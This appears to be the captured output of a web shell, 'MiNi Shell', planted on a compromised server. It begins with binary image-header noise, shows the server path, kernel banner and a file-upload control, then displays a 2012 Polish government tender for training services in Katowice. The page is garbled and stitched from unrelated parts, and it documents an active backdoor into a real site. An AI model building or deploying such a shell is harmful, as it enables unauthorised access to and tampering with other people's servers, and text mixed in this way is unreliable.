JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120824/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120824/314726-N-2012.html

<p class="kh_header"><b>Katowice: Zorganizowanie i przeprowadzenie usług szkoleniowych na rzecz Śląskiego Urzędu Wojewódzkiego w Katowicach</b><br>
<b>Numer ogłoszenia: 314726 - 2012; data zamieszczenia: 24.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Śląski Urząd Wojewódzki w Katowicach , ul. Jagiellońska 25, 40-032 Katowice, woj. śląskie, tel. 032 2077777, faks 032 2077395.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.katowice.uw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie usług szkoleniowych na rzecz Śląskiego Urzędu Wojewódzkiego w Katowicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie częściowe nr 1 - kompleksowa obsługa trzydniowego szkolenia dotycząca przygotowania i przeprowadzenia szkolenia z tematu System ubezpieczeń społecznych w powiązaniu z ustalaniem świadczeń na podstawie ustawy o promocji zatrudnienia i instytucjach rynku pracy, zapewnienia bazy noclegowo - konferencyjnej oraz transportu dla grupy nieprzekraczającej 38 osób, w tym dla pracowników Wydziału Polityki Społecznej Śląskiego Urzędu Wojewódzkiego i  Powiatowych Urzędów Pracy Województwa Śląskiego,  w terminie wykonania zamówienia: w okresie od 17 do 21 września  2012 r. (w ciągu trzech następujących po sobie dni roboczych). Zamówienie będzie realizowane w jednej grupie. Harmonogram szkolenia powinien obejmować nie mniej niż 28 godzin lekcyjnych (28 x 45 min.) tj. 21 godzin zegarowych, które zrealizowane zostaną w ciągu trzech dni szkoleniowych.
Zadanie częściowe nr 2 - kompleksowa obsługa trzydniowego szkolenia dotycząca przygotowania i przeprowadzenia szkolenia z tematu Postępowanie egzekucyjne w sprawach nienależnie pobranych świadczeń i innych środków pieniężnych wypłacanych przez powiatowe urzędy pracy na podstawie ustawy o promocji zatrudnienia i instytucjach rynku pracy, zapewnienia bazy noclegowo - konferencyjnej oraz transportu dla grupy nieprzekraczającej 38 osób, w tym dla pracowników Wydziału Polityki Społecznej Śląskiego Urzędu Wojewódzkiego i  Powiatowych Urzędów Pracy Województwa Śląskiego, 
w terminie wykonania zamówienia: w okresie od 15 do 26 października 2012 r. (w ciągu trzech następujących po sobie dni roboczych). Zamówienie będzie realizowane w jednej grupie. Harmonogram szkolenia powinien obejmować nie mniej niż 28 godzin lekcyjnych (28 x 45 min.) tj. 21 godzin zegarowych, które zrealizowane zostaną w ciągu trzech dni szkoleniowych. Ostateczna liczba uczestników określona zostanie na 2 dni robocze przed szkoleniem, jednak nie przekroczy ona 38 osób.Postępowanie o udzielenie zamówienia publicznego prowadzone jest w trybie przetargu nieograniczonego o wartości zamówienia nie przekraczającej wyrażonej w złotych równowartości kwoty 130.000 euro.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 55.00.00.00-0, 60.17.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek, jeżeli złoży oświadczenie z art. 22 ust.1 ustawy Pzp, (zgodnie z załącznikiem nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek, jeżeli złoży oświadczenie z art. 22 ust. 1 ustawy Pzp w tym zakresie (zgodnie z załącznikiem nr 2 do SIWZ) oraz wykaże, że wykonał w okresie ostatnich trzech lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie Wykonawca wykonał: 
dotyczy zadania częściowego nr 1:
co najmniej 6 usług porównywalnych z przedmiotem zamówienia z zastrzeżeniem, że przez usługę porównywalną z przedmiotem zamówienia zamawiający rozumie przeprowadzenie szkolenia wraz z jego kompleksową obsługą, w tym
-co najmniej 3 szkolenia, każde obejmujące przynajmniej dwa dni szkoleniowe tj.   dwa dni następujące po sobie dla grupy liczącej minimum 25 osób dotyczące systemu ubezpieczeń społecznych,
-co najmniej 3 szkolenia, każde obejmujące przynajmniej dwa dni szkoleniowe  tj.  dwa dni następujące po sobie dla grupy liczącej minimum 25 osób z zapewnieniem bazy noclegowej i całodziennego wyżywienia (zgodnie z załącznikiem nr 6 do SIWZ)
oraz dołączy dokumenty potwierdzające, że te usługi zostały wykonane lub są wykonywane należycie.
dotyczy zadania częściowego nr 2: 
co najmniej 6 usług porównywalnych z przedmiotem zamówienia z zastrzeżeniem, że przez usługę porównywalną z przedmiotem zamówienia zamawiający rozumie przeprowadzenie szkolenia wraz z jego kompleksową obsługą, w tym
-co najmniej 3 szkolenia, każde obejmujące przynajmniej dwa dni szkoleniowe tj. dwa dni następujące po sobie dla grupy liczącej minimum 25 osób dotyczące postępowania egzekucyjnego w administracji,
-co najmniej 3 szkolenia, każde obejmujące przynajmniej dwa dni szkoleniowe  tj. dwa dni następujące po sobie dla grupy liczącej minimum 25 osób z zapewnieniem bazy noclegowej i całodziennego wyżywienia (zgodnie z załącznikiem nr 6 do SIWZ) 
oraz dołączy dokumenty potwierdzające, że te usługi zostały wykonane lub są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek, jeżeli złoży oświadczenie z art. 22 ust.1 ustawy Pzp, (zgodnie z załącznikiem nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek, jeżeli złoży oświadczenie z art. 22 ust. 1 ustawy Pzp w tym zakresie (zgodnie z załącznikiem nr 2 do SIWZ) oraz wykaże, że dysponuje lub będzie dysponował: 
dotyczy zadania częściowego nr 1:
jednym trenerem do prowadzenia szkolenia pn. System ubezpieczeń społecznych w powiązaniu z ustalaniem świadczeń na podstawie ustawy o promocji zatrudnienia i instytucjach rynku pracy, posiadającego wyższe wykształcenie oraz następujące kwalifikacje i doświadczenie:
przeprowadzenie w okresie ostatnich trzech lat co najmniej 5 szkoleń w tym:
- co najmniej dwóch szkoleń, z których każde obejmowało przynajmniej dwa dni szkoleniowe - tj. minimum 14 godzin zegarowych - dla grupy liczącej minimum 25 osób z zakresu systemu ubezpieczeń społecznych (zgodnie z załącznikiem nr 7 do SIWZ)
dotyczy zadania częściowego nr 2:
jednym trenerem do prowadzenia szkolenia pn. Postępowanie egzekucyjne w sprawach nienależnie pobranych świadczeń i innych środków pieniężnych wypłacanych przez powiatowe urzędy pracy na podstawie ustawy o promocji zatrudnienia i instytucjach rynku pracy, posiadającego wyższe wykształcenie oraz następujące kwalifikacje i doświadczenie: 
przeprowadzenie w okresie ostatnich trzech lat co najmniej 5 szkoleń w tym:
- co najmniej dwóch szkoleń, z których każde obejmowało przynajmniej dwa dni szkoleniowe - tj. minimum 14 godzin zegarowych - dla grupy liczącej minimum 25 osób z zakresu postępowania egzekucyjnego w administracji (zgodnie z załącznikiem nr 7 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek, jeżeli złoży oświadczenie z art. 22 ust.1 ustawy Pzp, (zgodnie z załącznikiem nr 2 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dla zadania częściowego nr 1 i 2: 
a)	opis oferowanych usług (podpisany przez Wykonawcę Załącznik nr 4 - Opis przedmiotu zamówienia/opis oferowanych usług) wraz z Oświadczeniem o spełnianiu kryteriów, o których mowa w SIWZ; 
b)	podpisany przez Wykonawcę Załącznik nr 5 - Wykaz bazy wraz z szczegółowym opisem bazy materialnej - bazy noclegowo - gastronomiczno - konferencyjnej wraz z dokumentacją fotograficzną:
minimum 8 zdjęć, w wersji papierowej lub elektronicznej, przedstawiających hotel w tym jego otoczenie (2 zdjęcia), pokój jednoosobowy (1 zdjęcie), pokój dwuosobowy (1 zdjęcie), łazienkę (1 zdjęcie), salę konferencyjną (2 zdjęcia) restaurację (1 zdjęcie)</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokument określający zasady reprezentacji oraz osoby uprawnione do reprezentacji Wykonawcy, a jeżeli Wykonawcę reprezentuje pełnomocnik - także pełnomocnictwo, określające zakres umocowania podpisane przez osoby uprawnione do reprezentowania Wykonawcy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wprowadzenie zmian treści umowy wymaga sporządzenia pod rygorem nieważności pisemnego aneksu.
Zmiany te nie mogą naruszać postanowień art. 144 ust. 1 ustawy PZP, a potrzeba ich wprowadzenia może wynikać jedynie z następujących okoliczności:
1) zmian regulacji prawnych obowiązujących w dniu podpisania umowy, 
2) dopuszcza się możliwość zmiany miejsca wykonywania przedmiotu zamówienia w sytuacji wystąpienia siły wyższej, która uniemożliwi wykonanie go we wskazanym w ofercie miejscu. Za siłę wyższą uważa się zdarzenia zewnętrzne, których skutków nie da się przewidzieć ani im zapobiec. W szczególności za siłę wyższą będzie się uważa działania sił przyrody takie jak: huragan, trzęsienie ziemi, powódź, zamieszki, wojna. 
3) wynikną rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.katowice.uw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Śląski Urząd Wojewódzki w Katowicach, ul. Jagiellońska 25, Biuro Inwestycji, Zamówień Publicznych i Logistyki, pokój 626.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.09.2012 godzina 09:00, miejsce: Śląski Urząd Wojewódzki w Katowicach, ul. Jagiellońska 25, Biuro Obsługi Klienta,
pokój 119.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kompleksowa obsługa trzydniowego szkolenia dotycząca przygotowania i przeprowadzenia szkolenia z tematu System ubezpieczeń społecznych w powiązaniu z ustalaniem świadczeń na podstawie ustawy o promocji zatrudnienia i instytucjach rynku pracy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kompleksowa obsługa trzydniowego szkolenia dotycząca przygotowania i przeprowadzenia szkolenia z tematu System ubezpieczeń społecznych w powiązaniu z ustalaniem świadczeń na podstawie ustawy o promocji zatrudnienia i instytucjach rynku pracy, zapewnienia bazy noclegowo - konferencyjnej oraz transportu  dla grupy nieprzekraczającej 38 osób, w tym dla pracowników Wydziału Polityki Społecznej Śląskiego Urzędu Wojewódzkiego i  Powiatowych Urzędów Pracy Województwa Śląskiego.  
Termin wykonania zamówienia: w okresie od 17 do 21 września 2012 r. (w ciągu trzech następujących po sobie dni roboczych).
Zamówienie będzie realizowane w jednej grupie. Harmonogram szkolenia powinien obejmować nie mniej niż 28 godzin lekcyjnych (28 x 45 min.) tj. 21 godzin zegarowych, które zrealizowane zostaną w ciągu trzech dni szkoleniowych.Miejsce szkolenia: hotel o standardzie minimum trzygwiazdkowym spełniający standardy obiektów trzygwiazdkowych według Rozporządzenia Ministra Gospodarki i Pracy z dnia 19 sierpnia 2004 roku w sprawie obiektów hotelarskich i innych obiektów, w których świadczone są usługi hotelarskie (Dz. U. z 2006 roku Nr 22, poz. 169 z późn. zm.) położony na terenie województwa śląskiego, poza granicami miast wchodzących w skład aglomeracji śląskiej, w odległości do 100 km od Katowic.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 55.00.00.00-0, 60.17.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kompleksowa obsługa trzydniowego szkolenia dotycząca przygotowania i przeprowadzenia szkolenia z tematu Postępowanie egzekucyjne w sprawach nienależnie pobranych świadczeń i innych środków pieniężnych wypłacanych przez powiatowe urzędy pracy na podstawie ustawy o promocji zatrudnienia i instytucjach rynku pracy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kompleksowa obsługa trzydniowego szkolenia dotycząca przygotowania i przeprowadzenia szkolenia z tematu Postępowanie egzekucyjne w sprawach nienależnie pobranych świadczeń i innych środków pieniężnych wypłacanych przez powiatowe urzędy pracy na podstawie ustawy o promocji zatrudnienia i instytucjach rynku pracy, zapewnienia bazy noclegowo - konferencyjnej oraz transportu dla grupy nieprzekraczającej 38 osób, w tym dla pracowników Wydziału Polityki Społecznej Śląskiego Urzędu Wojewódzkiego i  Powiatowych Urzędów Pracy Województwa Śląskiego.  
Termin wykonania zamówienia: w okresie od 15 do 26 października 2012 r. (w ciągu trzech następujących po sobie dni roboczych).
Zamówienie będzie realizowane w jednej grupie.
	Harmonogram szkolenia powinien obejmować nie mniej niż 28 godzin lekcyjnych (28 x 45 min.) tj. 21 godzin zegarowych, które zrealizowane zostaną w ciągu trzech dni szkoleniowych.
Miejsce szkolenia: hotel o standardzie minimum trzygwiazdkowym spełniający standardy obiektów trzygwiazdkowych według Rozporządzenia Ministra Gospodarki i Pracy z dnia 19 sierpnia 2004 roku w sprawie obiektów hotelarskich i innych obiektów, w których świadczone są usługi hotelarskie (Dz. U. z 2006 roku Nr 22, poz. 169 z późn. zm.) położony na terenie województwa śląskiego, poza granicami miast wchodzących w skład aglomeracji śląskiej, w odległości do 100 km od Katowic.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 55.00.00.00-0, 60.17.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com